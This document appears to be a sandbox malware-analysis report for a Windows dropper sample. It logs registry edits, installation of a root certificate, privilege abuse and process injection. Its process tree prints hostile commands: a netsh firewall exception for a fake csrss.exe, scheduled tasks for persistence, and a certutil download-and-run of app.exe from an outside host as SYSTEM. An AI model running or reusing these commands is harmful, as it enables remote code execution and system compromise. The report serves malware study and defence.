Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	Graphics.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

patch.execsrss.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exeGraphics.exe

pid	process
992	pub2.exe
992	pub2.exe
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
620	Graphics.exe
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260
1260

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

468
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

992 pub2.exe

pid	process
468

Suspicious use of AdjustPrivilegeToken 40 IoCs

Processes:

Install.exemd9_1sjm.exeSoCleanInst.exetaskkill.exeGraphics.execsrss.exe

description	pid	process
Token: SeCreateTokenPrivilege	2032	Install.exe
Token: SeAssignPrimaryTokenPrivilege	2032	Install.exe
Token: SeLockMemoryPrivilege	2032	Install.exe
Token: SeIncreaseQuotaPrivilege	2032	Install.exe
Token: SeMachineAccountPrivilege	2032	Install.exe
Token: SeTcbPrivilege	2032	Install.exe
Token: SeSecurityPrivilege	2032	Install.exe
Token: SeTakeOwnershipPrivilege	2032	Install.exe
Token: SeLoadDriverPrivilege	2032	Install.exe
Token: SeSystemProfilePrivilege	2032	Install.exe
Token: SeSystemtimePrivilege	2032	Install.exe
Token: SeProfSingleProcessPrivilege	2032	Install.exe
Token: SeIncBasePriorityPrivilege	2032	Install.exe
Token: SeCreatePagefilePrivilege	2032	Install.exe
Token: SeCreatePermanentPrivilege	2032	Install.exe
Token: SeBackupPrivilege	2032	Install.exe
Token: SeRestorePrivilege	2032	Install.exe
Token: SeShutdownPrivilege	2032	Install.exe
Token: SeDebugPrivilege	2032	Install.exe
Token: SeAuditPrivilege	2032	Install.exe
Token: SeSystemEnvironmentPrivilege	2032	Install.exe
Token: SeChangeNotifyPrivilege	2032	Install.exe
Token: SeRemoteShutdownPrivilege	2032	Install.exe
Token: SeUndockPrivilege	2032	Install.exe
Token: SeSyncAgentPrivilege	2032	Install.exe
Token: SeEnableDelegationPrivilege	2032	Install.exe
Token: SeManageVolumePrivilege	2032	Install.exe
Token: SeImpersonatePrivilege	2032	Install.exe
Token: SeCreateGlobalPrivilege	2032	Install.exe
Token: 31	2032	Install.exe
Token: 32	2032	Install.exe
Token: 33	2032	Install.exe
Token: 34	2032	Install.exe
Token: 35	2032	Install.exe
Token: SeManageVolumePrivilege	1808	md9_1sjm.exe
Token: SeDebugPrivilege	1980	SoCleanInst.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	620	Graphics.exe
Token: SeImpersonatePrivilege	620	Graphics.exe
Token: SeSystemEnvironmentPrivilege	1596	csrss.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exeInstall.execmd.exeGraphics.execmd.exeFile.exepatch.exe

description	pid	process	target process
PID 1876 wrote to memory of 1980	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	SoCleanInst.exe
PID 1876 wrote to memory of 1980	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	SoCleanInst.exe
PID 1876 wrote to memory of 1980	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	SoCleanInst.exe
PID 1876 wrote to memory of 1980	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	SoCleanInst.exe
PID 1876 wrote to memory of 1808	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	md9_1sjm.exe
PID 1876 wrote to memory of 1808	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	md9_1sjm.exe
PID 1876 wrote to memory of 1808	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	md9_1sjm.exe
PID 1876 wrote to memory of 1808	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	md9_1sjm.exe
PID 1876 wrote to memory of 580	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Folder.exe
PID 1876 wrote to memory of 580	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Folder.exe
PID 1876 wrote to memory of 580	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Folder.exe
PID 1876 wrote to memory of 580	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Folder.exe
PID 1876 wrote to memory of 620	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Graphics.exe
PID 1876 wrote to memory of 620	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Graphics.exe
PID 1876 wrote to memory of 620	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Graphics.exe
PID 1876 wrote to memory of 620	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Graphics.exe
PID 1876 wrote to memory of 816	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Updbdate.exe
PID 1876 wrote to memory of 816	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Updbdate.exe
PID 1876 wrote to memory of 816	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Updbdate.exe
PID 1876 wrote to memory of 816	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Updbdate.exe
PID 1876 wrote to memory of 2032	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Install.exe
PID 1876 wrote to memory of 2032	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Install.exe
PID 1876 wrote to memory of 2032	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Install.exe
PID 1876 wrote to memory of 2032	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Install.exe
PID 1876 wrote to memory of 2032	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Install.exe
PID 1876 wrote to memory of 2032	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Install.exe
PID 1876 wrote to memory of 2032	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Install.exe
PID 1876 wrote to memory of 1544	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Files.exe
PID 1876 wrote to memory of 1544	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Files.exe
PID 1876 wrote to memory of 1544	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Files.exe
PID 1876 wrote to memory of 1544	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	Files.exe
PID 1876 wrote to memory of 992	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	pub2.exe
PID 1876 wrote to memory of 992	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	pub2.exe
PID 1876 wrote to memory of 992	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	pub2.exe
PID 1876 wrote to memory of 992	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	pub2.exe
PID 1876 wrote to memory of 1088	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	File.exe
PID 1876 wrote to memory of 1088	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	File.exe
PID 1876 wrote to memory of 1088	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	File.exe
PID 1876 wrote to memory of 1088	1876	9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe	File.exe
PID 2032 wrote to memory of 1620	2032	Install.exe	cmd.exe
PID 2032 wrote to memory of 1620	2032	Install.exe	cmd.exe
PID 2032 wrote to memory of 1620	2032	Install.exe	cmd.exe
PID 2032 wrote to memory of 1620	2032	Install.exe	cmd.exe
PID 1620 wrote to memory of 2028	1620	cmd.exe	taskkill.exe
PID 1620 wrote to memory of 2028	1620	cmd.exe	taskkill.exe
PID 1620 wrote to memory of 2028	1620	cmd.exe	taskkill.exe
PID 1620 wrote to memory of 2028	1620	cmd.exe	taskkill.exe
PID 976 wrote to memory of 1236	976	Graphics.exe	cmd.exe
PID 976 wrote to memory of 1236	976	Graphics.exe	cmd.exe
PID 976 wrote to memory of 1236	976	Graphics.exe	cmd.exe
PID 976 wrote to memory of 1236	976	Graphics.exe	cmd.exe
PID 1236 wrote to memory of 1584	1236	cmd.exe	netsh.exe
PID 1236 wrote to memory of 1584	1236	cmd.exe	netsh.exe
PID 1236 wrote to memory of 1584	1236	cmd.exe	netsh.exe
PID 976 wrote to memory of 1596	976	Graphics.exe	csrss.exe
PID 976 wrote to memory of 1596	976	Graphics.exe	csrss.exe
PID 976 wrote to memory of 1596	976	Graphics.exe	csrss.exe
PID 976 wrote to memory of 1596	976	Graphics.exe	csrss.exe
PID 1088 wrote to memory of 1652	1088	File.exe	kEr7GFa8cE1DrzemeCx_fozi.exe
PID 1088 wrote to memory of 1652	1088	File.exe	kEr7GFa8cE1DrzemeCx_fozi.exe
PID 1088 wrote to memory of 1652	1088	File.exe	kEr7GFa8cE1DrzemeCx_fozi.exe
PID 1088 wrote to memory of 1652	1088	File.exe	kEr7GFa8cE1DrzemeCx_fozi.exe
PID 1560 wrote to memory of 2016	1560	patch.exe	bcdedit.exe
PID 1560 wrote to memory of 2016	1560	patch.exe	bcdedit.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2296 attrib.exe

pid	process
2296	attrib.exe

C:\Users\Admin\AppData\Local\Temp\9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe
"C:\Users\Admin\AppData\Local\Temp\9c279c03507b6d6d7422c5a994f205b91a1ddb60d98e9544c09e098d2d2b5aea.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1876

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:580

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:1236

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies data under HKEY_USERS
PID:1584

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1208

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
5⤵
- Creates scheduled task(s)
